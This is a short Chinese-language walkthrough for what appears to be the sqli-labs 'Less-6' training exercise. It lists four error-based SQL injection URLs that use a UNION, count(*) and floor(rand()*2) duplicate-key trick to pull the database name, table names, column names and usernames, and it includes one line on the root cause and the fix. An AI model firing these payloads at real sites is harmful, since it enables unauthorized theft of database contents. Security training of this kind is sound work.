获取database
http://sqli/Less-6/?id=1" union select null, count(*), concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- -
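两次执行即可爆出 database：数据库名出现在页面回显的 MySQL 重复键(Duplicate entry)报错信息中。根因是 id 参数被直接拼接进 SQL 语句，且数据库错误被回显到页面；改用参数化查询并关闭错误回显即可阻断。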
获取表名
http://sqli/Less-6/?id=1" union select null, count(*), concat((select table_name from information_schema.tables where table_schema = "security" limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a -- -
两次执行即可爆表名
获取列名
http://sqli/Less-6/?id=1" union select null, count(*), concat((select column_name from information_schema.columns where table_schema = "security" limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a -- -
两次执行即可爆出列名
获取字段值
http://sqli/Less-6/?id=1" union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a -- -
爆出字段值(数据)